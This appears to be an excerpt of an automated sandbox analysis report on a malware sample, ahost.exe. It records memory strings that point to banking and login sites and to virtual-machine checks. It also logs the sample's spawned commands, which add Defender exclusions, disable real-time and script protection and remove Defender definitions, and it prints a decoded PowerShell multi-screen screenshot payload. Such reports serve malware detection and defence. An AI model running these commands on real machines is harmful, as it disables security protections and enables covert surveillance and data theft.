              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696497155j
              Source: getmac.exe, 00000050.00000002.1620437806.0000015C237CF000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ssubkeyname"system\currentcontrolset\services\hyper-v\linkage"tta
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696497155t
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser
              Source: getmac.exe, 00000050.00000003.1618251992.0000015C237CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetPropValue.sSubKeyName("SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage");
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696497155o
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwaretray
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
              Source: ahost.exe, 00000002.00000003.1618434399.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1600677108.000002162CF9E000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1632068064.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1618001204.000002162CF9D000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1603827636.000002162CDB4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866944008.000002162CDB4000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1642271166.000002162D061000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000002.1873852301.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1866135475.000002162D05C000.00000004.00000020.00020000.00000000.sdmp, ahost.exe, 00000002.00000003.1634120545.000002162CF9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Requirements: VM Monitor Mode Extensions: No
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxtray
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
              Source: getmac.exe, 00000050.00000002.1620437806.0000015C23811000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618837674.0000015C2380E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: __PARAMETERSSYSTEM\CurrentControlSet\Services\Hyper-V\LinkageExport
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696497155
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696497155
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: f8vmware
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
              Source: getmac.exe, 00000050.00000002.1620437806.0000015C23811000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618837674.0000015C2380E000.00000004.00000020.00020000.00000000.sdmp, getmac.exe, 00000050.00000003.1618251992.0000015C237F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SYSTEM\CurrentControlSet\Services\Hyper-V\Linkage
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696497155t
              Source: ahost.exe, 00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: |f4vmusrvc
              Source: svchost.exe, 00000015.00000002.2643755689.0000021781E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696497155}
              Source: ahost.exe, 00000002.00000003.1629779862.000002162D0E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696497155x
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91ED19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F91ED19C
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F92034F0 GetProcessHeap,0_2_00007FF7F92034F0
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\tasklist.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91ED19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F91ED19C
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91ED37C SetUnhandledExceptionFilter,0_2_00007FF7F91ED37C
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91FA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F91FA684
              Source: C:\Users\user\Desktop\ahost.exeCode function: 0_2_00007FF7F91EC910 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7F91EC910
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91ED19C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7F91ED19C
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91ED37C SetUnhandledExceptionFilter,2_2_00007FF7F91ED37C
              Source: C:\Users\user\Desktop\ahost.exeCode function: 2_2_00007FF7F91FA684 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00007FF7F91FA684
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8E4C10 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,104_2_00007FF7CF8E4C10
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8DB6D8 SetUnhandledExceptionFilter,104_2_00007FF7CF8DB6D8
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8DA66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,104_2_00007FF7CF8DA66C
              Source: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exeCode function: 104_2_00007FF7CF8DB52C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,104_2_00007FF7CF8DB52C

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr'
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\ahost.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
